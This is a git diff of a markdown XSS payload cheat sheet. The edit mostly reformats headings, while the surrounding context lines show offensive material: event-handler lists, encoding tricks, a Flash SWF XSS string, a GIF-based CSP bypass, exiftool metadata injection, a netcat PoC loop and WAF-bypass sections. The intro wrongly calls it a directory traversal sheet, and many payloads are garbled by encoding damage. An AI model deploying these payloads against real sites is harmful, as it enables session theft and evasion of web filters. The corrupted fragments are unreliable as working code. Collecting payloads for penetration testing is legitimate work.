diff --git a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md index 27a48e7..ab7fea2 100644 --- a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md +++ b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md @@ -1,10 +1,10 @@ -ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET +# ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET -Note: This is a technical sheet for research about directory- and path traversal attacks. -Please continue the ultimate directory traversal cheat sheet list or contribute to update. -This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats. +# Note: This is a technical sheet for research about directory- and path traversal attacks. +# Please continue the ultimate directory traversal cheat sheet list or contribute to update. +# This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats. -Tags to Trigger XSS Attacks: +# Tags to Trigger XSS Attacks: onclick ondblclick onmousedown @@ -29,7 +29,7 @@ onreset onselect onMoveOn -Brackets for Tags +# Brackets for Tags >" "> <" @@ -114,7 +114,7 @@ Pjw= \u003c \u003C -XSS Strings: +# XSS Strings: @@ -192,7 +192,7 @@ exp/*">'> '';!--"=&{()} @@ -410,7 +410,7 @@ perl -e 'print "alert(\"XSS\")";' > out -Flash SWF XSS +# Flash SWF XSS ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf @@ -451,7 +451,7 @@ d="alert('XSS');\")"; eval(a+b+c+d); -XML Schema +# XML Schema XSS @@ -558,14 +558,14 @@ PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ ì> -Firefox (\x09, \x0a, \x0d, \x20) -Chrome (Any character \x01 to \x20) +# Firefox (\x09, \x0a, \x0d, \x20) +# Chrome (Any character \x01 to \x20) alert(0) @@ -823,43 +823,43 @@ a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototyp
-File Upload Injection in Filename +# File Upload Injection in Filename ì>.gifInjection in Metadata $ exiftool -Artist='î>í FILENAME.jpegInjection with SVG File -Injection with GIF File as Source of Script (CSP Bypass) +# Injection with GIF File as Source of Script (CSP Bypass) GIF89a/**/=alert(document.domain)//; -Google Chrome -Auditor Bypass +# Google Chrome +# Auditor Bypass Server Log Avoidance #alert(1) @@ -1073,12 +1073,12 @@ Server Log Avoidance #alert(1) -Shortest PoC +# Shortest PoC $ while:; do echo ìalert(1)î | nc -lp80; done -Portable WordPress RCE -Wordfence XSS Bypasses +# Wordfence XSS Bypasses > -Incapsula WAF Bypasses +# Incapsula WAF Bypasses